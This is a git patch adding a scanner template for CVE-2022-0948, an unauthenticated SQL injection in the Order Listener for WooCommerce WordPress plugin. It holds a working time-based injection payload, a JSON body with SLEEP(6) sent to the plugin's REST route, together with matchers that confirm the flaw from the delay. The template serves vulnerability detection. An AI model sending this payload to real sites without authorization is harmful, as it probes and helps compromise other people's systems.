From f0f87d7c9f009f3de397217bbd3d92362e477475 Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Sat, 3 Dec 2022 16:34:00 +0530 Subject: [PATCH] Added template for CVE-2022-0948 --- cves/2022/CVE-2022-0948.yaml | 44 ++++++++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 cves/2022/CVE-2022-0948.yaml diff --git a/cves/2022/CVE-2022-0948.yaml b/cves/2022/CVE-2022-0948.yaml new file mode 100644 index 0000000000..a5199a57ff --- /dev/null +++ b/cves/2022/CVE-2022-0948.yaml @@ -0,0 +1,44 @@ +id: CVE-2022-0948 + +info: + name: Order Listener for WooCommerce < 3.2.2 - Unauthenticated SQLi + author: theamanrawat + severity: critical + description: | + The Order Listener for WooCommerce WordPress plugin before 3.2.2 does not sanitise and escape the id parameter before using it in a SQL statement via a REST route available to unauthenticated users, leading to an SQL injection. + reference: + - https://wpscan.com/vulnerability/daad48df-6a25-493f-9d1d-17b897462576 + - https://wordpress.org/plugins/woc-order-alert/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-0948 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-0948 + cwe-id: CWE-89 + metadata: + verified: "true" + tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,woc-order-alert,unauth + +requests: + - raw: + - | + GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1 + Host: {{Hostname}} + + - | + @timeout: 15s + POST /?rest_route=/olistener/new HTTP/1.1 + Host: {{Hostname}} + content-type: application/json + + {"id":" (SLEEP(6))#"} + + req-condition: true + matchers: + - type: dsl + dsl: + - 'duration_2>=6' + - 'status_code_2 == 200' + - 'contains(content_type_2, "application/json")' + - 'contains(body_1, "olistener-action.olistener-controller")' + condition: and \ No newline at end of file